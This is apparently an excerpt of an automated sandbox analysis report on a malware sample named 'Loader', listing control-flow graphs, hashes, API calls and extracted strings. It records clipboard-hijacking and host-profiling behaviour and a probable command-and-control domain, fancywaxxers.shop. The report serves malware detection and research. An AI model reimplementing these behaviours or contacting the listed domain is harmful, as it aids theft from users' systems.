                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocString$BlanketCreateInformationInitInstanceProxyVariantVolume
                                                                                          • String ID: !B$C$oTUJ
                                                                                          • API String ID: 1810270423-3346123761
                                                                                          • Opcode ID: 92c28b2f1e1ce454a1989aec24678e01c31857c879c3496e424f8912745cb02b
                                                                                          • Instruction ID: 4797e4197787e1ccd0c2251949579dafbeb3e9d5dd3206026abedc5e4ab30956
                                                                                          • Opcode Fuzzy Hash: 92c28b2f1e1ce454a1989aec24678e01c31857c879c3496e424f8912745cb02b
                                                                                          • Instruction Fuzzy Hash: 4E32FE71A483518BD714CF24C88176BBBE1EBCA314F14992EE8D59B391D378D806CB9B

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • Sleep.KERNELBASE(00000001), ref: 052A1032
                                                                                          • OpenClipboard.USER32(00000000), ref: 052A103C
                                                                                          • GetClipboardData.USER32(0000000D), ref: 052A104C
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 052A105D
                                                                                          • GlobalAlloc.KERNEL32(00000002,-00000004), ref: 052A1090
                                                                                          • GlobalLock.KERNEL32 ref: 052A10A0
                                                                                          • GlobalUnlock.KERNEL32 ref: 052A10C1
                                                                                          • EmptyClipboard.USER32 ref: 052A10CB
                                                                                          • SetClipboardData.USER32(0000000D), ref: 052A10D6
                                                                                          • GlobalFree.KERNEL32 ref: 052A10E3
                                                                                          • GlobalUnlock.KERNEL32(?), ref: 052A10ED
                                                                                          • CloseClipboard.USER32 ref: 052A10F3
                                                                                          • GetClipboardSequenceNumber.USER32 ref: 052A10F9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3277608913.00000000052A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 052A0000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3277590466.00000000052A0000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3277624321.00000000052A2000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_52a0000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
                                                                                          • String ID:
                                                                                          • API String ID: 1416286485-0
                                                                                          • Opcode ID: 1ebfda791b672e3ede4c123d9b62fddfca99a578cf491fbecb9d545600beda99
                                                                                          • Instruction ID: a0a83be011418fc1073a673a03725f68e8981a86a7c06d966fead7700372552a
                                                                                          • Opcode Fuzzy Hash: 1ebfda791b672e3ede4c123d9b62fddfca99a578cf491fbecb9d545600beda99
                                                                                          • Instruction Fuzzy Hash: BC219B3A634251DBD7282B71BC0EB6A7FA9FF05761F040465FD4AD61D0EF618810CB61

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 888 40ffd6-40ffee 889 40fff0-40fff3 888->889 890 410032-410069 call 401860 889->890 891 40fff5-410030 889->891 894 41006b-41006e 890->894 891->889 895 410110-410144 call 401860 894->895 896 410074-41010b 894->896 899 410146-410187 call 413870 895->899 900 410148 895->900 896->894 907 410189 899->907 908 41018b-4101d3 call 407fc0 call 40a620 899->908 902 410c74 900->902 903 4118e9 902->903 905 4118eb-411906 call 401f20 903->905 915 40e4e6-411917 905->915 916 40e4ed-40e515 call 401f30 905->916 907->908 921 4101d5-4101d8 908->921 922 40e517-40e51a 916->922 923 410266-410281 call 401860 921->923 924 4101de-410261 921->924 925 40e533-40e56c call 401e20 922->925 926 40e51c-40e531 922->926 931 410283-4102a4 call 413870 923->931 932 4102cc-4102fd call 413870 923->932 924->921 934 40e570 925->934 935 40e56e-40e591 925->935 926->922 943 4102a6 931->943 944 4102a8-4102c7 call 407fc0 call 40a620 931->944 940 410301-4103a4 call 407fc0 call 40a620 RtlExpandEnvironmentStrings 932->940 941 4102ff 932->941 934->905 942 40e593-40e596 935->942 957 4103a6-4103a9 940->957 941->940 947 40e5c7-40e61c call 401960 942->947 948 40e598-40e5c5 942->948 943->944 944->932 947->903 955 40e622 947->955 948->942 955->903 958 4103f2-410406 957->958 959 4103ab-4103f0 957->959 960 410408-410419 call 407fd0 958->960 961 41041e-410437 958->961 959->957 969 410c72 960->969 963 410439 961->963 964 41043b-41049d call 407fc0 961->964 963->964 971 4104c6-4104f1 call 407fd0 964->971 972 41049f-4104c1 call 407fd0 * 2 964->972 969->902 981 4104f3-4104f6 971->981 986 410c70 972->986 984 410522-41054b call 401860 981->984 985 4104f8-410520 981->985 989 41054d 984->989 990 41054f-410570 call 413870 984->990 985->981 986->969 991 41059d-4105b5 989->991 997 410572 990->997 998 410574-410598 call 407fc0 call 40a620 990->998 993 4105b7-4105ba 991->993 995 4105c0-410644 993->995 996 410649-410691 call 401b70 993->996 995->993 1004 410694-410697 996->1004 997->998 998->991 1005 4106f3-410714 call 401a70 1004->1005 1006 410699-4106f1 1004->1006 1009 41071a-410761 call 401f20 1005->1009 1010 410b1c-410bae call 408b50 call 414930 1005->1010 1006->1004 1015 410763 1009->1015 1016 410765-410785 call 407fc0 1009->1016 1019 410bb3-410bc9 call 4096b0 1010->1019 1015->1016 1022 4107b0-4107b2 1016->1022 1023 410787-410790 1016->1023 1027 410c18-410c44 call 407fd0 * 2 1019->1027 1028 410bcb-410bdf 1019->1028 1026 4107b4-4107bd 1022->1026 1025 410792-41079e call 4139b0 1023->1025 1043 4107a0-4107ae 1025->1043 1031 4107cb-41080b call 401f30 1026->1031 1032 4107bf-4107c6 1026->1032 1056 410c46-410c49 call 407fd0 1027->1056 1057 410c4e-410c58 1027->1057 1033 410be1-410bea 1028->1033 1034 410c07-410c16 call 407fd0 1028->1034 1045 41080d-410810 1031->1045 1032->1010 1041 410bec-410bfc call 413b60 1033->1041 1034->1027 1053 410bfe-410c05 1041->1053 1043->1022 1048 410882-4108c9 call 401860 1045->1048 1049 410812-410880 1045->1049 1061 4108cb-4108ce 1048->1061 1049->1045 1053->1034 1056->1057 1059 410c62-410c6e call 408c30 1057->1059 1060 410c5a-410c5d call 407fd0 1057->1060 1059->986 1060->1059 1064 4108d0-4108eb 1061->1064 1065 4108ed-41093c call 401860 1061->1065 1064->1061 1069 41093e-410941 1065->1069 1070 410947-4109ea 1069->1070 1071 4109ef-410a41 call 401b70 1069->1071 1070->1069 1074 410a43-410a46 1071->1074 1075 410a48-410a98 1074->1075 1076 410a9a-410b17 call 401b70 call 4139d0 1074->1076 1075->1074 1076->1026
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: !$0$:$=$H$Q$R$Z$|
                                                                                          • API String ID: 0-2647137366
                                                                                          • Opcode ID: f791f164d742791169fef67f2675f96a806319c50ed3faa86751d73b7e79b0e1
                                                                                          • Instruction ID: b1c587c69972fe86ad369410b5a1af1c9ee2814cf2c8545fb68a45fe4272fdb3
                                                                                          • Opcode Fuzzy Hash: f791f164d742791169fef67f2675f96a806319c50ed3faa86751d73b7e79b0e1
                                                                                          • Instruction Fuzzy Hash: 3E72A272A0C7808BD324DB39C89139FBBD2ABD5314F198A3EE5D9D73C1D67889418B46
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Ktrr$NCGA$^jk[$b,B$fancywaxxers.shop$gPRf$~~
                                                                                          • API String ID: 0-3155797656
                                                                                          • Opcode ID: 9732420e11d04317ffb174467f05412886ab3ecec205061c9218f6f2eccd2ce3
                                                                                          • Instruction ID: 94f55b53ddaffc0f10203bef1cd3c4aa6590c85254d220e29af91e2d34122216
                                                                                          • Opcode Fuzzy Hash: 9732420e11d04317ffb174467f05412886ab3ecec205061c9218f6f2eccd2ce3
                                                                                          • Instruction Fuzzy Hash: EFB23175608351CBD314CF29D88126BBBE2FF86310F48897DE9D58B391DB789906CB86

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1453 434460-43454c GetSystemMetrics * 2 1459 434553-434851 1453->1459
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: MetricsSystem
                                                                                          • String ID: $EKC$`LC$lKC$rHC
                                                                                          • API String ID: 4116985748-523529498
                                                                                          • Opcode ID: f14ede883a64fc22c4e803d8ae2d7de582ceef30be9ed441c710ed16ffbb3712
                                                                                          • Instruction ID: ed053f1949e861fbaa0d96d56bbd1847bf0cf4b0b235e97d76566608e50df858
                                                                                          • Opcode Fuzzy Hash: f14ede883a64fc22c4e803d8ae2d7de582ceef30be9ed441c710ed16ffbb3712
                                                                                          • Instruction Fuzzy Hash: 16912FB45093808FE760DF14D58978BBBF1BBC5708F10892EE5988B351DBB99848DF4A

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1466 40d75b-40d78f call 434460 call 4096b0 CoUninitialize 1471 40d790-40d7ae 1466->1471 1471->1471 1472 40d7b0-40d7cf 1471->1472 1473 40d7d0-40d7f5 1472->1473 1473->1473 1474 40d7f7-40d85f 1473->1474 1475 40d860-40d882 1474->1475 1475->1475 1476 40d884-40d895 1475->1476 1477 40d897-40d8a5 1476->1477 1478 40d8bb-40d8ca 1476->1478 1479 40d8b0-40d8b9 1477->1479 1480 40d8db-40d8e8 1478->1480 1481 40d8cc-40d8cf 1478->1481 1479->1478 1479->1479 1483 40d8ea-40d8f1 1480->1483 1484 40d90b-40d913 1480->1484 1482 40d8d0-40d8d9 1481->1482 1482->1480 1482->1482 1485 40d900-40d909 1483->1485 1486 40d915-40d916 1484->1486 1487 40d92b-40d935 1484->1487 1485->1484 1485->1485 1488 40d920-40d929 1486->1488 1489 40d937-40d93b 1487->1489 1490 40d94b-40d957 1487->1490 1488->1487 1488->1488 1493 40d940-40d949 1489->1493 1491 40d971-40da8f 1490->1491 1492 40d959-40d95b 1490->1492 1495 40da90-40dabe 1491->1495 1494 40d960-40d96d 1492->1494 1493->1490 1493->1493 1494->1494 1496 40d96f 1494->1496 1495->1495 1497 40dac0-40dadf 1495->1497 1496->1491 1498 40dae0-40db06 1497->1498 1498->1498 1499 40db08-40db49 call 40b620 1498->1499
                                                                                          APIs
                                                                                            • Part of subcall function 00434460: GetSystemMetrics.USER32 ref: 004344A9
                                                                                            • Part of subcall function 00434460: GetSystemMetrics.USER32 ref: 004344B9
                                                                                          • CoUninitialize.COMBASE ref: 0040D770
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: MetricsSystem$Uninitialize
                                                                                          • String ID: ;8$fancywaxxers.shop$hSnY$khZp
                                                                                          • API String ID: 1128523136-1874093197
                                                                                          • Opcode ID: 3cd5eabe0aded617b4ba2f9d7c918d7c30aa78df103585c26a0bd7b421f5f68d
                                                                                          • Instruction ID: b74903e71e8f716a9a88ed692504ce4700a07b82aaccec82dcfcfa98f5602128
                                                                                          • Opcode Fuzzy Hash: 3cd5eabe0aded617b4ba2f9d7c918d7c30aa78df103585c26a0bd7b421f5f68d
                                                                                          • Instruction Fuzzy Hash: E891DFB090C3D18AD3358F2580907EBFBE1ABD7304F18496DD4DA6B392C7788509CB9A

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1502 4087b0-4087c1 call 43e510 1505 4087c7-4087ce call 4363b0 1502->1505 1506 408a4f-408a51 ExitProcess 1502->1506 1509 4087d4-4087f8 GetCurrentProcessId GetCurrentThreadId 1505->1509 1510 408a4a call 43ee20 1505->1510 1512 4087fa-4087fc 1509->1512 1513 4087fe-408922 SHGetSpecialFolderPathW 1509->1513 1510->1506 1512->1513 1514 408930-40894f 1513->1514 1514->1514 1515 408951-40897f call 43cfd0 1514->1515 1518 408980-40899c 1515->1518 1519 4089b6-4089c9 GetForegroundWindow 1518->1519 1520 40899e-4089b4 1518->1520 1521 408a14-408a2c call 409bb0 1519->1521 1522 4089cb-4089ef 1519->1522 1520->1518 1527 408a38-408a3f 1521->1527 1528 408a2e call 40c880 1521->1528 1523 4089f1-4089f3 1522->1523 1524 4089f5-408a12 1522->1524 1523->1524 1524->1521 1527->1510 1530 408a41-408a47 call 407fd0 1527->1530 1531 408a33 call 40b5f0 1528->1531 1530->1510 1531->1527
                                                                                          APIs
                                                                                          • GetCurrentProcessId.KERNEL32 ref: 004087D4
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 004087DE
                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004088FC
                                                                                          • GetForegroundWindow.USER32 ref: 004089C1
                                                                                          • ExitProcess.KERNEL32 ref: 00408A51
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                          • String ID:
                                                                                          • API String ID: 4063528623-0
                                                                                          • Opcode ID: 54462c685be16421f6194d86c174339d0282144dba7c7d0f03c2668cceba3d88
                                                                                          • Instruction ID: 9a300c1681b891008e909fe3257d388318bfb44b29180f89294f6db9c3555df2
                                                                                          • Opcode Fuzzy Hash: 54462c685be16421f6194d86c174339d0282144dba7c7d0f03c2668cceba3d88
                                                                                          • Instruction Fuzzy Hash: AB613A72B443044FC318EF69CD5536AB6D69BC9310F09C53EA8C4AB3E5EE789C058A99

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1535 422f70-422fc7 1536 422fd0-42300b 1535->1536 1536->1536 1537 42300d-423059 RtlExpandEnvironmentStrings 1536->1537 1538 423060-4230b7 1537->1538 1538->1538 1539 4230b9-4230c4 1538->1539 1540 423392-42339b 1539->1540 1541 423382-423389 1539->1541 1542 423111-423117 call 407fd0 1539->1542 1543 423376-42337b 1539->1543 1544 423127 1539->1544 1545 42311a-423126 1539->1545 1546 4230cb-4230d1 1539->1546 1547 423109 1539->1547 1548 423269-423272 1539->1548 1549 42312d-423136 1539->1549 1556 4233a4 1540->1556 1557 42339d-4233a2 1540->1557 1541->1540 1542->1545 1543->1540 1543->1541 1550 423530-4235db 1543->1550 1551 423640-423662 1543->1551 1552 42352a 1543->1552 1553 423518-423522 1543->1553 1544->1549 1558 4230d3-4230d8 1546->1558 1559 4230da 1546->1559 1547->1542 1560 423280 1548->1560 1561 423274-423279 1548->1561 1554 423138-42313d 1549->1554 1555 42313f 1549->1555 1567 4235e0-423612 1550->1567 1569 423670-42369e 1551->1569 1552->1550 1553->1552 1563 423146-423181 call 407fc0 1554->1563 1555->1563 1564 4233ab-423452 call 407fc0 1556->1564 1557->1564 1565 4230dd-423102 call 407fc0 RtlExpandEnvironmentStrings 1558->1565 1559->1565 1566 423287-4232c9 call 407fc0 1560->1566 1561->1566 1583 423190-4231dc 1563->1583 1584 423460-423490 1564->1584 1565->1540 1565->1541 1565->1542 1565->1543 1565->1544 1565->1545 1565->1547 1565->1548 1565->1549 1585 4232d0-42331b 1566->1585 1567->1567 1574 423614-423631 call 420dd0 1567->1574 1569->1569 1575 4236a0-423724 1569->1575 1598 42363a 1574->1598 1576 423730-423756 1575->1576 1576->1576 1582 423758-42377d call 4209b0 1576->1582 1608 423786 1582->1608 1583->1583 1588 4231de-4231e9 1583->1588 1584->1584 1589 423492-42349d 1584->1589 1585->1585 1590 42331d-42332c 1585->1590 1592 423201-42320e 1588->1592 1593 4231eb-4231ee 1588->1593 1594 4234c1-4234ce 1589->1594 1595 42349f-4234a6 1589->1595 1596 423342-42334f 1590->1596 1597 42332e 1590->1597 1600 423210-423214 1592->1600 1601 423231-423244 call 441f50 1592->1601 1599 4231f0-4231ff 1593->1599 1603 4234d0-4234d4 1594->1603 1604 4234f1-423511 GetLogicalDrives call 441f50 1594->1604 1602 4234b0-4234bf 1595->1602 1606 423250-42325b call 441f50 1596->1606 1607 423355-423359 1596->1607 1605 423330-423340 1597->1605 1598->1551 1599->1592 1599->1599 1609 423220-42322f 1600->1609 1601->1548 1602->1594 1602->1602 1611 4234e0-4234ef 1603->1611 1604->1551 1604->1552 1604->1553 1604->1598 1604->1608 1619 4237a4-4237aa call 407fd0 1604->1619 1620 42379e 1604->1620 1621 42378c-423795 call 407fd0 1604->1621 1622 4237ad-4237b3 call 407fd0 1604->1622 1605->1596 1605->1605 1617 423260 1606->1617 1612 423360-42336f 1607->1612 1608->1621 1609->1601 1609->1609 1611->1604 1611->1611 1612->1612 1618 423371 1612->1618 1617->1548 1618->1606 1619->1622 1620->1619 1621->1620 1629 4237b6 1622->1629 1629->1629
                                                                                          APIs
                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 00423041
                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 004230F4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnvironmentExpandStrings
                                                                                          • String ID: ~~
                                                                                          • API String ID: 237503144-3574127172
                                                                                          • Opcode ID: c4c472e46fa3863ed812600143a1e91a35e575045751546efa44a3f4b90bf9b0
                                                                                          • Instruction ID: be22e521949e80bfa6a031671857a5ba9b29f52d2d452f9ff4a016b8a06bfdda
                                                                                          • Opcode Fuzzy Hash: c4c472e46fa3863ed812600143a1e91a35e575045751546efa44a3f4b90bf9b0
                                                                                          • Instruction Fuzzy Hash: EB122FB6A083608BD310CF59E88021BBBF1FFD5314F14896DE9D59B350DB789A068B86
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ~~
                                                                                          • API String ID: 0-3574127172
                                                                                          • Opcode ID: 47dd2df0fa5dd291b6f97a9fff72f1a02d2570d06c7a8b667f8be9833521f2e5
                                                                                          • Instruction ID: 7dbfdddcb27124cc5a5c4f8af779dcc8181431db2658f0e649bf51fcd82c8dbe
                                                                                          • Opcode Fuzzy Hash: 47dd2df0fa5dd291b6f97a9fff72f1a02d2570d06c7a8b667f8be9833521f2e5
                                                                                          • Instruction Fuzzy Hash: B7320D75A18311CBD314CF28E84122BB7F2FF85315F08896DE9858B3A5DB78D946CB86

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1812 42da21-42da46 1813 42da50-42da92 1812->1813 1813->1813 1814 42da94-42daa1 1813->1814 1815 42daa3-42daa9 1814->1815 1816 42dabb-42dac7 1814->1816 1817 42dab0-42dab9 1815->1817 1818 42dae1-42db23 call 4409b0 1816->1818 1819 42dac9-42dacb 1816->1819 1817->1816 1817->1817 1825 42db30-42db7b 1818->1825 1820 42dad0-42dadd 1819->1820 1820->1820 1822 42dadf 1820->1822 1822->1818 1825->1825 1826 42db7d-42dbc2 call 41d7a0 1825->1826 1829 42dbd0-42dc2b 1826->1829 1829->1829 1830 42dc2d-42dc34 1829->1830 1831 42dc36-42dc41 1830->1831 1832 42dc5d-42dc60 1830->1832 1833 42dc50-42dc59 1831->1833 1834 42dc64-42dc6c 1832->1834 1833->1833 1835 42dc5b 1833->1835 1836 42dc7b-42dc85 1834->1836 1837 42dc6e-42dc6f 1834->1837 1835->1834 1839 42dc87-42dc8b 1836->1839 1840 42dc9b-42dce6 1836->1840 1838 42dc70-42dc79 1837->1838 1838->1836 1838->1838 1841 42dc90-42dc99 1839->1841 1842 42dcf0-42dd56 1840->1842 1841->1840 1841->1841 1842->1842 1843 42dd58-42dd5f 1842->1843 1844 42dd61-42dd6f 1843->1844 1845 42dd7d-42dd81 1843->1845 1846 42dd70-42dd79 1844->1846 1847 42dd84-42dd8e 1845->1847 1846->1846 1848 42dd7b 1846->1848 1849 42dd90-42dd94 1847->1849 1850 42ddab-42de59 1847->1850 1848->1847 1851 42dda0-42dda9 1849->1851 1852 42de60-42dea2 1850->1852 1851->1850 1851->1851 1852->1852 1853 42dea4-42deb1 1852->1853 1854 42deb3-42deb5 1853->1854 1855 42decb-42ded7 1853->1855 1858 42dec0-42dec9 1854->1858 1856 42def1-42df3b call 4409b0 GetPhysicallyInstalledSystemMemory 1855->1856 1857 42ded9-42dedb 1855->1857 1863 42df40-42df8b 1856->1863 1859 42dee0-42deed 1857->1859 1858->1855 1858->1858 1859->1859 1861 42deef 1859->1861 1861->1856 1863->1863 1864 42df8d-42dfcf call 41d7a0 1863->1864 1867 42dfd0-42e02b 1864->1867 1867->1867 1868 42e02d-42e034 1867->1868 1869 42e050 1868->1869 1870 42e036-42e03f 1868->1870 1871 42e053-42e05f 1869->1871 1872 42e040-42e049 1870->1872 1873 42e061-42e062 1871->1873 1874 42e07b-42e085 1871->1874 1872->1872 1875 42e04b 1872->1875 1876 42e070-42e079 1873->1876 1877 42e087-42e08b 1874->1877 1878 42e09b-42e0e6 1874->1878 1875->1871 1876->1874 1876->1876 1879 42e090-42e099 1877->1879 1880 42e0f0-42e156 1878->1880 1879->1878 1879->1879 1880->1880 1881 42e158-42e15f 1880->1881 1882 42e180-42e187 1881->1882 1883 42e161-42e16c 1881->1883 1885 42e18b-42e195 1882->1885 1884 42e170-42e179 1883->1884 1884->1884 1886 42e17b 1884->1886 1887 42e197 1885->1887 1888 42e1ab-42e235 1885->1888 1886->1885 1889 42e1a0-42e1a9 1887->1889 1889->1888 1889->1889
                                                                                          APIs
                                                                                          • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042DF1F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: InstalledMemoryPhysicallySystem
                                                                                          • String ID: CV,^$gue3
                                                                                          • API String ID: 3960555810-3407280499
                                                                                          • Opcode ID: f3ebf605be4dd65c58c762228fb8a13e8e5602d94894f8a1cf6226854c9fd278
                                                                                          • Instruction ID: 98bee3bd0e59378419626ccd196ac9573ee343c68945e602011319479aa8ab1c
                                                                                          • Opcode Fuzzy Hash: f3ebf605be4dd65c58c762228fb8a13e8e5602d94894f8a1cf6226854c9fd278
                                                                                          • Instruction Fuzzy Hash: 5C221971A0C7A18BD325CF29D45036BBFD2AFD6314F1889AED4D99B341C6798806CB86
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 18E245005AC07055C82A8148C6E54400$y
                                                                                          • API String ID: 0-3975365502
                                                                                          • Opcode ID: b35c5bb82a01e4a7c2276de52e7c42d158e759bc3991b7bdc95bf005c1ca11a9
                                                                                          • Instruction ID: d13ed370f9a74bd7b192be9fef28f454f71df1e5009caa2d1751917904e576f4
                                                                                          • Opcode Fuzzy Hash: b35c5bb82a01e4a7c2276de52e7c42d158e759bc3991b7bdc95bf005c1ca11a9
                                                                                          • Instruction Fuzzy Hash: F55128729083908BD724CB34CC516EFB7D3EBD6358F198A3DD8C9A7292E77549018746
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: 1076$@
                                                                                          • API String ID: 2994545307-367735841
                                                                                          • Opcode ID: 4fbbcb8d525073f89878eba708add4101803d8ad08485b0c83275c496f97ac63
                                                                                          • Instruction ID: 6080835bd154c549e24ed2745c425b690c6264ddf926f1aa5c5581f431cd1e19
                                                                                          • Opcode Fuzzy Hash: 4fbbcb8d525073f89878eba708add4101803d8ad08485b0c83275c496f97ac63
                                                                                          • Instruction Fuzzy Hash: 0C414370A043008BE704CF25D88176BB7E1EF95328F44862EF998573A1E7799909C78A
                                                                                          APIs
                                                                                          • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042D398
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: ComputerName
                                                                                          • String ID:
                                                                                          • API String ID: 3545744682-0
                                                                                          • Opcode ID: a8cd61548bb627cd29eb74a14310a77809775b5788a73ff04523b65aa42a5ad7
                                                                                          • Instruction ID: 9c47b220125fd7b37665d45bd4979fc666182093a46d2320396b4aa24af95e72
                                                                                          • Opcode Fuzzy Hash: a8cd61548bb627cd29eb74a14310a77809775b5788a73ff04523b65aa42a5ad7
                                                                                          • Instruction Fuzzy Hash: 1C21C4766487428BE3208F7CEC923DBBBE69FC6314F68857DD598C7291DB7884068B01
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(?,00000000), ref: 0043CFFB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: aedaec0e2d58949988fc3ab68ae91bb68b8f1b976ef8575a48542654c1965c67
                                                                                          • Instruction ID: 1f346047a94a575cb9e9090b5b75e991c9877b57263cff9fb7a1015185431757
                                                                                          • Opcode Fuzzy Hash: aedaec0e2d58949988fc3ab68ae91bb68b8f1b976ef8575a48542654c1965c67
                                                                                          • Instruction Fuzzy Hash: B0D0C930490220AAE2152F119D19F16BE34EB53343F025070B105260B38A30D935CAAD
                                                                                          APIs
                                                                                          • LdrInitializeThunk.NTDLL(00441F2A,00000002,00000018,?,?,00000018,?,?,?), ref: 0043EEEE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
